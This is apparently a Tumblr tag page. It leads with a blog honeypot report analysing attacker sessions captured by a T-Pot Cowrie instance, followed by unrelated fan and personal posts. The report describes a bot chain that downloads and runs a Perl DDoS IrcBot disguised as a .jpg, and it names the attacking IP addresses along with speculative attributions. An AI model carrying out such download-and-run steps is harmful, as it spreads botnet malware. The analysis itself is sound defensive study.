Discover Top Posts Tagged with #t-pot

Honeypot Report - T-Pot: Cowrie

INTRODUCTION

Honeypots are great for creating decoys within your network to lure threats into a controlled and safe environment.

For this project, we’ll be analyzing the data generated by my T-Pot Honeypot from Telekom Security. This T-Pot is based on the Debian 10 Buster AWS Instance, and supports dockered containers with multiple honeypots and tools, running on an ELK (Elastisearch, Logstash, and Kibana) Stack virtualizer. ***reference: https://www.elastic.co/what-is/elk-stack

I’ve hosted this honeypot in Tokyo, AWS Asia Pacific ap-northeast 1 region.

Though we won’t be going over all the honeypots in the T-Pot, we’ll be specifically focusing on two: Cowrie and ADBHoney, over an 12 hour period. We’ll analyze the data I’ve monitored to identify the attacker and it’s malware, as well as a bit of OSINT analysis of the attackers’ IP addresses using Spiderfoot – with Shodan, VirusTotal, and AlienVault OTX modules.

SETUP

**Refer to this link for setting up the T-Pot environments: https://pillothecat-hacks.tumblr.com/post/675724421501222912/honeypot-t-pot-setup

OVERVIEW OF COWRIE & ADBHONEY

Cowrie is a medium to high SSH and Telnet honeypot (ports 22 and 23 respectively) for logging brute force attacks and shell interactions. The medium interaction mode (shell) emulates a UNIX system in Python, and in high interaction mode (proxy) it functions as an SSH and telnet proxy to observe the attacker’s behavior. *** reference: “https://github.com/cowrie/cowrie”

ADBHoney is a low interaction honeypot for Android Debug Bridge over TCP/IP. An Android Debug Bridge (ADB) is a protocol to keep track of emulated and real phones/TVs,DVRs connected to a given host. Though this protocol is intentionally for developers to debug or push content to the devices, malicious attackers can run shell commands and execute binaries. ***reference: “https://github.com/huuck/ADBHoney”

COWRIE ATTACK OVERVIEW

The scope of the attacks we will review will be for a 12 hour period, from Tuesday, February 8, 2022 12:00pm – Wednesday, February 9, 2022 12:00am. We’ll start off with a general overview of the statistics of attackers who executed commands in the Cowrie honeypot.

Setting Cowrie and Command Input Filter

Head over to the “Discover” tab.

Filter the day/time range on the right top corner of the Kibana T-Pot dashboard.

Next, we’ll want to add a filter for Cowrie; click “Add filter”.

Set Field:type and Operator:is – set the Value to “Cowrie”, and save.

Add another filter in the same way as above, except set Field:input.keyword and Operator:exists, and save.

Finally select the following fields on the left hand panel menu shown below:

We’ve filtered our search to view the command line inputs of our attackers on our Cowrie honeypot!

To summarize the information that we’ve filtered, please refer to the table below.

The remainder of the analysis will be categorized by grouping the attackers into colors, based on the type of attack they’ve conducted. For example, we’ll notice that the attacks from Moscow and Bejing and the attacks from Bryansk, Tainan City, Lesenice, and Tadworth are all running similar commands, and highly suggests that we are seeing a botnet conducting reconnaissance of the network, OS, and even searching for any cryptominers. More careful analysis and understanding of each command line execution will be found in each individual section. For now, familiarize yourself with the various attackers, where they are coming from, and identify which attack commands resemble each other.

COWRIE - ATTACKER ANALYSIS

Botnet Reconnaissance of MikroTik Devices– Moscow, Russia (1) and Bejing, China (5)

Attacker 1 (37.204.98.9) and Attacker 5 (94.75.149.161) both have a series of commands to run reconnaissance on the cowrie honeypot. As explained blow, each command enumerates system information: RouterOS, CPU information, network interfaces, etc. The attack also searches through directories of specific services that often have vulnerabilities from how the service communicates with the system, specifically for MikroTik devices.

When researching MikroTik devices, I found some reports on MikroTik devices being vulnerable to VPN malware, and warnings of routers being compromised by a Coinhive cryptocurrency malware. The information helps us to make more sense of why the botnet was conducting reconnaissance of the system; we’ll notice that each command is to look for vulnerabilities well known within MikroTik devices, including searching for any processes named “Miner” in order to infect any crypto mining processes.

Refer to the table below for the specific descriptions of each input.

https://malwaremily.medium.com/honeypot-logs-a-botnets-search-for-mikrotik-routers-48e69e110e52

Botnet Reconnaissance through Busybox – Bryansk, Russia (3); Tainan City, Taiwan (4); Lesenice, Slovakia(6); Tadwork, United Kingdom(7)

With the expansion of technology and connections between Internet of Things (IoT), more devices may be prone to attacks. However, since malware is compiled for a specific platform, careful reconnaissance is important for an attacker to know which malware they will be using on respective target’s operating system and hardware. Much like the previous attack, the series of commands are run by a bot to enumerate system information.

*** refer to https://www.iij.ad.jp/en/dev/iir/pdf/iir_vol36_focused1_EN.pdf (last page) for more information

We’ll notice that the last command is a removal of the .s file, in which the attacker copied the echo command and performed reconnaissance of the system’s architecture. If the attack was successful, the command would be followed by a wget command to download the payload, and also a chmod command to change the permissions of the file as executable. Fortunately, no payload was identified in any of these attacks. Granted that the honeypot sent a fake output in response to the reconnaissance efforts (an example shown below), it is possible that the botnet either did not have the appropriate malware (for the fake system) or maybe even knew that this machine was a honeypot, thus ending their attack.

Single Script Reconnaissance – Seoul, South Korea(2)

This reconnaissance script is by far the simplest of the earlier two attacks that we’ve examined. We don’t see any download commands that were run after this reconnaissance, so like the earlier examples, we’ll see the attack stopped after it’s reconnaissance efforts.

Perl Script Payload – Taipei, Taiwan(8)

The very last attack we see from Taipei, Taiwan (211.22.65.18) is my personal favorite since there is a malicious file that was downloaded.

Like the attacker from Seoul, the attacker from Taipei starts with system enumeration with the uname command. But then, it runs wget to download znoki.jpg. Interestingly, the attacker uses Perl to open the jpg file. The last two commands shows the attacker erasing their footprint by removing all files and clearing the history.

In a seperate post, I will be going over a more in-depth malware analysis of this Perl script – setting up a VM to execute the malware and capturing the traffic on Wireshark. For now, we’ll take a high level overview of what this malware is. First, download the malicious file.

When we check the file type, we’ll once again confirm that the file is a Perl executable script.

In the header we can see that the malware is a DDoS Perl IrcBot v1.0.

Additionally, we can analyze the md5 hash of the file on Virus Total. As we’ll see, it seems as though the malware is running bots and creating backdoors to partake in a DDoS attack.

Once again, if you are interested in a more in depth analysis of this perl script, refer to this link:

-->

https://pillothecat-hacks.tumblr.com/post/675914553459146752/honeypot-report-ddos-perl-ircbot-v10

OSINT ON ATTACKERS

Open Source Intelligence is the process of gathering information of a target through open and public information. For our analysis, we’ll be mainly using Spiderfoot (which is built into the ELK stack) – with Shodan, Virus Total, and AlienVault OTX modules.

Set-Up

To add the API keys, go to the Spiderfoot dashboard à Settings, and search for the respective modules on the left hand panel. ***Shodan, Virus Total, and AlienVault OTX are all open source tools; you should also be able to make a free account and then find the API keys within their settings/account page.

Now we can scan our targets by going to the “New Scan” tab and adding our respective target’s ip address and creating a name.

I will be scanning only two IP addresses from the analysis that we did earlier:

Machine 2 (14.36.38.99) – Seoul, South Korea

And Machine 8 (211.22.65.18) – Taipei, Taiwan

OSINT - Machine 2 (14.36.38.99) – Seoul, South Korea

Here is a general summary of the information gathered from Spiderfoot. We’ll see that Spiderfoot enumerated malicious affiliate IP addresses, open TCP ports, and even the software used.

I’m mainly interested in where the attack is coming from, so we’ll take a look at the Physical Location and Physical Coordinates.

We can also check and verify these coordinates on https://www.gps-coordinates.net (sample of Gyoneggi-do location below).

After researching KT Head Office, I am led to believe that it is referring to KT Telecommunications, one of the largest wireless carriers in South Korea. It seems a bit odd that the attack was being sent from here, but it’s quite possible that the command was executed by an infected host with a botnet. It especially makes sense that a botnet targets a telecommunication company for its confidential/sensitive data and wide ranging network.

Just to make sure, we can check the Affiliate – Email Addresses information in Spiderfoot and we’ll see a list of emails with similar data elements that tell us that these emails were associated with DDoS attack. A couple of the tags even tell us that the emails are “bots” and have been blacklisted.

OSINT - Machine 8 (211.22.65.18) – Taipei, Taiwan

The general summary from Machine 8 has almost 7x more elements than that of Machine 2. The Spiderfoot results also picks up a lot more specific information like hacked email accounts, affiliate company names, and even DNS SPF records.

Keep in mind that Machine 8 is the attacker who downloaded the DDoS Perl IrcBot v1.0. Unlike the previous case where the suspected botnet from Machine 2 was performing reconnaissance of our honeypot, Machine 8 was infecting our honeypot to become a part of the botnet. Since Machine 8 is doing the infection, it makes sense as to why the Affiliate – Internet Name and the Similar Domain search results are much higher.

Like earlier, we’ll start by finding the physical geolocation of this attacker.

Searching these geolocations, we’ll notice that all are from Tapei: two of them are from Banks and the third one is from a non-profit called American Institute in Taiwan (AIT).

However, when we search Machine 8’s IP address from Talos Intelligence (under the whois tab) we’ll be given a different location and the organization Chunghwa Telecom Co., another very well known Telecommunications company in South-East Asia.

I thought it was interesting how the origin of the attack was from another telecommunications company, and this made me reflect how different organizations and industries might have more relevant assets that attackers will be interested in obtaining. Pretty important to think about!

CLOSING THOUGHTS

After conducting this analysis, normally we should turn our attention to best practices for defending ourselves against such attacks. Granted that for this project we’ve deliberately set our AWS security group’s inbound rule to be vulnerable, we can still see how open inbound rules should normally be restricted to trusted users or for those in the LAN. We can also consider closing any unused ports, as we saw many attackers gain their initial foothold by ssh and unloading various reconnaissance scripts.

Thank you for reading and learning and growing with me! I’m super excited to continue sharing the results I find from my honeypot! In the next post we’ll take a look at the username and passwords from Cowrie attacks and even examine some attacks and graphs from the ADBHoney pot. And again, here is a post of a deeper analysis on the DDoS Perl IrcBot v1.0 https://pillothecat-hacks.tumblr.com/post/675914553459146752/honeypot-report-ddos-perl-ircbot-v10.

Here is the link for part 2 of this report on ADBHoney: https://pillothecat-hacks.tumblr.com/post/676280043114217472/honeypot-report-t-pot-adbhoney

Until then, keep yourselves secured in the network!

#honeypot #T-Pot #Cowrie #Spiderfoot #Botnet #DDoS malware

{VIDEO} 160429 ‪#‎EXO‬ with SPAO T-POT

~J.Lyn~

#exo #160429 #spao #t-pot #video

"In life, you learn lessons. And sometimes you learn them the hard way. Sometimes you learn them too late."

-Taylor Swift

#taylor swift #tswizzle #t-pot #backstage

Week

I've had a pretty good week as well I've spent it with Tia and other friends really and considering I don't go out much being out for nearly a whole week is alot for me, I gotta really thank Tia for trying to attempt to drag me back out into society and life :P I had alot of fun hanging out with you this week more than I can explain xD (since I know you'll be reading this at one point) This week I think I'm going to spend it all inside doing what I usually do it's strange I'm weird about going out alot but I do enjoy the time inside since I love doing my own thing ^_^

#t-pot #personal #friends #life

Christmas

Had a good Christmastime so far spent most of the day with my family and Tia (T-pot) just talking and then having Christmas dinner and listening to music which was pretty fun. Now I'm going to sit down and play my new game ! I hope all my awesome followers have a good christmas too =)

#christmas #followers #t-pot